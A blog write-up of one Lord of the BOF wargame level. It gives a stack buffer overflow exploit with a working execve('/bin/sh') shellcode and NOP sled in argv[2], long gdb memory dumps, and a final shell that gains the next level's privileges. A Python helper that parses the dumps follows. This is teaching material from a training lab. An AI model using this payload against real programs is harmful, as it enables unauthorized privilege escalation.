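Ahh... Monday at dawn, and I hit the peak of refreshment.

Nothing else was really holding my attention, so I set out to solve BOF원정대 (LOB), and, ahh...

I put the shellcode in and it was solved in one shot, ahahaha. Time to go mix some rice into stir-fried jaban.

This time the length of argv[1] was restricted, so I put the shellcode in argv[2] and just pointed the return address there.

The payload is as follows: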

`python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

A somewhat truncated log... I guess?

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\xec\x

fc\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜

 

Breakpoint 1, 0x8048617 in main ()

(gdb) x/100x $esp-100

0xbffffb28:     0xfffffe7d      0x4005d920      0x400143e0      0xbffffb4c

0xbffffb38:     0x40066070      0x40106980      0x4000ae60      0xbffffbd4

0xbffffb48:     0xbffffb88      0x08048613      0xbffffb60      0x00000000

0xbffffb58:     0x00000028      0x00000013      0x00000000      0x00000000

0xbffffb68:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb78:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb88:     0xbfbfbfbf      0xbfbffcec      0x00000000      0xbffffbd4

0xbffffb98:     0xbffffbe4      0x40013868      0x00000003      0x08048450

0xbffffba8:     0x00000000      0x08048471      0x08048500      0x00000003

0xbffffbb8:     0xbffffbd4      0x08048390      0x0804864c      0x4000ae60

0xbffffbc8:     0xbffffbcc      0x40013e90      0x00000003      0xbffffcc7

0xbffffbd8:     0xbffffce2      0xbffffd13      0x00000000      0xbffffe58

0xbffffbe8:     0xbffffe7a      0xbffffe84      0xbffffe92      0xbffffeb1

0xbffffbf8:     0xbffffec1      0xbffffeda      0xbffffef7      0xbfffff01

0xbffffc08:     0xbfffff0f      0xbfffff52      0xbfffff65      0xbfffff7a

0xbffffc18:     0xbfffff8a      0xbfffff97      0xbfffffb6      0xbfffffc1

0xbffffc28:     0xbfffffce      0xbfffffd6      0x00000000      0x00000003

0xbffffc38:     0x08048034      0x00000004      0x00000020      0x00000005

0xbffffc48:     0x00000006      0x00000006      0x00001000      0x00000007

0xbffffc58:     0x40000000      0x00000008      0x00000000      0x00000009

0xbffffc68:     0x08048450      0x0000000b      0x000001f9      0x0000000c

0xbffffc78:     0x000001f9      0x0000000d      0x000001f9      0x0000000e

0xbffffc88:     0x000001f9      0x00000010      0x0febfbff      0x0000000f

0xbffffc98:     0xbffffcc2      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffca8:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb)

(gdb) x/100x $esp-500

0xbffff998:     0x40000000      0x00000000      0x400139d0      0x00000000

0xbffff9a8:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff9b8:     0x40013a08      0x40013a00      0x400139d8      0x400139e0

0xbffff9c8:     0x400139e8      0x00000000      0x00000000      0x00000000

0xbffff9d8:     0x400139f0      0x400139f8      0x00000000      0x00000000

0xbffff9e8:     0x400139d0      0x40029b0e      0xbffffac0      0x400081e6

0xbffff9f8:     0x40029ad5      0x40029ad5      0x40013868      0x400143e0

0xbffffa08:     0x00004388      0x40013868      0x40029b0e      0xbffffae4

0xbffffa18:     0x400081e6      0x40029ad5      0x40029ad5      0x40013868

0xbffffa28:     0x400143e0      0x0000785c      0x400081e6      0x40029ad5

0xbffffa38:     0x080482f9      0x40013868      0x40013ed0      0x00000021

0xbffffa48:     0x00000075      0x4001ad70      0x00007080      0x40029b0e

0xbffffa58:     0xbffffb28      0x00000000      0x40029ad5      0x40021df0

0xbffffa68:     0x00000708      0x40021fd0      0x4001ad70      0x400143e0

0xbffffa78:     0x00000003      0x40014650      0x00000001      0xbffffa9c

0xbffffa88:     0x40021df0      0x400145e4      0x0d790266      0xbffffb18

0xbffffa98:     0x4002982c      0x40021df0      0x400143e0      0x400140d4

0xbffffaa8:     0x077905a6      0xbffffb30      0x08048275      0x4001b630

0xbffffab8:     0x400143e0      0x400143e0      0x40014650      0x00000001

0xbffffac8:     0xbffffae0      0x08048184      0x400140d4      0x078e530f

0xbffffad8:     0xbffffb5c      0x080482d0      0x40021ca0      0xbffffb1c

0xbffffae8:     0x4000a7fd      0x400143d0      0x400146b0      0x00000007

0xbffffaf8:     0x4000a74e      0x401081ec      0x4000ae60      0xbffffbd4

0xbffffb08:     0x400143e0      0x40021df0      0x401088c0      0x4002982c

---Type <return> to continue, or q <return> to quit---

0xbffffb18:     0x40021df0      0xbffffb4c      0x4000a970      0xbffffd13

(gdb) x/100x $ebp-300

0xbfbfbe93:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbea3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbeb3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbec3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbed3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbee3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbef3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf03:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf13:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf23:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf33:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf43:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf53:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf63:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf73:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf83:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf93:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfa3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfb3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfc3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfd3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfe3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbff3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfc003:     0x00000000      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/300wx $esp

0xbffffb8c:     0xbfbffcec      0x00000000      0xbffffbd4      0xbffffbe4

0xbffffb9c:     0x40013868      0x00000003      0x08048450      0x00000000

0xbffffbac:     0x08048471      0x08048500      0x00000003      0xbffffbd4

0xbffffbbc:     0x08048390      0x0804864c      0x4000ae60      0xbffffbcc

0xbffffbcc:     0x40013e90      0x00000003      0xbffffcc7      0xbffffce2

0xbffffbdc:     0xbffffd13      0x00000000      0xbffffe58      0xbffffe7a

0xbffffbec:     0xbffffe84      0xbffffe92      0xbffffeb1      0xbffffec1

0xbffffbfc:     0xbffffeda      0xbffffef7      0xbfffff01      0xbfffff0f

0xbffffc0c:     0xbfffff52      0xbfffff65      0xbfffff7a      0xbfffff8a

0xbffffc1c:     0xbfffff97      0xbfffffb6      0xbfffffc1      0xbfffffce

0xbffffc2c:     0xbfffffd6      0x00000000      0x00000003      0x08048034

0xbffffc3c:     0x00000004      0x00000020      0x00000005      0x00000006

0xbffffc4c:     0x00000006      0x00001000      0x00000007      0x40000000

0xbffffc5c:     0x00000008      0x00000000      0x00000009      0x08048450

0xbffffc6c:     0x0000000b      0x000001f9      0x0000000c      0x000001f9

0xbffffc7c:     0x0000000d      0x000001f9      0x0000000e      0x000001f9

0xbffffc8c:     0x00000010      0x0febfbff      0x0000000f      0xbffffcc2

0xbffffc9c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffcac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffcbc:     0x00000000      0x36690000      0x2f003638      0x656d6f68

0xbffffccc:     0x6c6f772f      0x6e616d66      0x706d742f      0x7474612f

0xbffffcdc:     0x6d6b6361      0xbfbf0065      0xbfbfbfbf      0xbfbfbfbf

0xbffffcec:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

0xbffffcfc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c:     0xfcecbfbf      0x9000bfbf      0x90909090      0x90909090

0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe0c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe3c:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f

0xbffffe4c:     0x5350e389      0xb099e189      0x0080cd0b      0x00000000

0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe7c:     0x00000000      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) q

The program is running.  Exit anyway? (y or n) y

[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xb

f"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62

\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

bash: ./darkelf: No such file or directory

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

Segmentation fault (core dumped)

[wolfman@localhost tmp]$ gdb -q core

 

 

"/home/wolfman/tmp/core": not in executable format: File format not recognized

(gdb) disas main

No symbol table is loaded.  Use the "file" command.

(gdb) q

[wolfman@localhost tmp]$ gdb -q attackme

(gdb) b *main+279

Breakpoint 1 at 0x8048617

(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x9

0"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x8

9\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\x6c\x

fd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

 

Breakpoint 1, 0x8048617 in main ()

(gdb) x/330wx $esp

0xbffffb8c:     0x4000fd6c      0x00000004      0xbffffbd4      0xbffffbe8

0xbffffb9c:     0x40013868      0x00000004      0x08048450      0x00000000

0xbffffbac:     0x08048471      0x08048500      0x00000004      0xbffffbd4

0xbffffbbc:     0x08048390      0x0804864c      0x4000ae60      0xbffffbcc

0xbffffbcc:     0x40013e90      0x00000004      0xbffffcc7      0xbffffce2

0xbffffbdc:     0xbffffd11      0xbffffd13      0x00000000      0xbffffe58

0xbffffbec:     0xbffffe7a      0xbffffe84      0xbffffe92      0xbffffeb1

0xbffffbfc:     0xbffffec1      0xbffffeda      0xbffffef7      0xbfffff01

0xbffffc0c:     0xbfffff0f      0xbfffff52      0xbfffff65      0xbfffff7a

0xbffffc1c:     0xbfffff8a      0xbfffff97      0xbfffffb6      0xbfffffc1

0xbffffc2c:     0xbfffffce      0xbfffffd6      0x00000000      0x00000003

0xbffffc3c:     0x08048034      0x00000004      0x00000020      0x00000005

0xbffffc4c:     0x00000006      0x00000006      0x00001000      0x00000007

0xbffffc5c:     0x40000000      0x00000008      0x00000000      0x00000009

0xbffffc6c:     0x08048450      0x0000000b      0x000001f9      0x0000000c

0xbffffc7c:     0x000001f9      0x0000000d      0x000001f9      0x0000000e

0xbffffc8c:     0x000001f9      0x00000010      0x0febfbff      0x0000000f

0xbffffc9c:     0xbffffcc2      0x00000000      0x00000000      0x00000000

0xbffffcac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffcbc:     0x00000000      0x36690000      0x2f003638      0x656d6f68

0xbffffccc:     0x6c6f772f      0x6e616d66      0x706d742f      0x7474612f

0xbffffcdc:     0x6d6b6361      0xbfbf0065      0xbfbfbfbf      0xbfbfbfbf

0xbffffcec:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

0xbffffcfc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c:     0xfd6cbfbf      0x9000bf00      0x90909090      0x90909090

0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe0c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe3c:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f

0xbffffe4c:     0x5350e389      0xb099e189      0x0080cd0b      0x00000000

0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe7c:     0x00000000      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffe8c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe9c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffeac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffebc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffecc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffedc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffeec:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffefc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff0c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff1c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff2c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff3c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff4c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff5c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff6c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff7c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff8c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff9c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffffac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffffbc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffffcc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffffdc:     0x00000000      0x6f682f00      0x772f656d      0x6d666c6f

0xbfffffec:     0x742f6e61      0x612f706d      0x63617474      0x00656d6b

0xbffffffc:     0x00000000      Cannot access memory at address 0xc0000000

(gdb)

(gdb) q

The program is running.  Exit anyway? (y or n) y

[wolfman@localhost tmp]$ bash2

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

bash$ id

uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)

bash$ q

sh: q: command not found

bash$ exit

exit

[wolfman@localhost tmp]$ cd ../

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xf

f\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f

\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

bash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505

(wolfman)

bash$ whoami

darkelf

bash$ my-pass

euid = 506

kernel crashed

bash$
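To read the dumps in the log above, the following added example (not part of the original post) parses gdb `x/wx` output into bytes, finds the run of 0x90 padding, and checks whether a given word points into it. The sample is an excerpt of the page's second `x/330wx $esp` session; the function names are hypothetical, and treating the word at `$esp` as the saved return address is an assumption based on the breakpoint position.

```python
import re
import struct

# Excerpt from the page's second `x/330wx $esp` session, cut after 0xbffffd6c.
DUMP = """\
(gdb) x/330wx $esp
0xbffffb8c:     0x4000fd6c      0x00000004      0xbffffbd4      0xbffffbe8
---Type <return> to continue, or q <return> to quit---
0xbffffd0c:     0xfd6cbfbf      0x9000bf00      0x90909090      0x90909090
0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090
"""

ROW = re.compile(r"^(0x[0-9a-f]+):((?:\s+0x[0-9a-f]{8})+)$")


def parse_dump(text):
    """Map address -> byte value from gdb `x/wx` rows (little-endian i386)."""
    mem = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # prompts, pager lines, blank or partial rows
        base = int(m.group(1), 16)
        for i, word in enumerate(m.group(2).split()):
            for j, byte in enumerate(struct.pack("<I", int(word, 16))):
                mem[base + 4 * i + j] = byte
    return mem


def nop_sleds(mem, min_len=16):
    """Return (start, end_exclusive) for each run of 0x90 at consecutive addresses."""
    sleds, run = [], []
    for addr in sorted(mem):
        if mem[addr] == 0x90 and (not run or addr == run[-1] + 1):
            run.append(addr)
            continue
        if len(run) >= min_len:
            sleds.append((run[0], run[-1] + 1))
        run = [addr] if mem[addr] == 0x90 else []
    if len(run) >= min_len:
        sleds.append((run[0], run[-1] + 1))
    return sleds


def word_at(mem, addr):
    """Read one little-endian 32-bit word back out of the byte map."""
    return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]


def lands_in_sled(target, sleds):
    return any(lo <= target < hi for lo, hi in sleds)


if __name__ == "__main__":
    mem = parse_dump(DUMP)
    sleds = nop_sleds(mem)
    ret = word_at(mem, 0xbffffb8c)  # assumed: saved return address at $esp
    print([(hex(lo), hex(hi)) for lo, hi in sleds], hex(ret), lands_in_sled(ret, sleds))
```

On this excerpt the word at `$esp` is 0x4000fd6c and the argument bytes at 0xbffffd0e read `6c fd 00 bf`, so the 0xff byte never reached the process in that session; the page's successful runs come after it switches to `bash2`.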



Posted by windowhan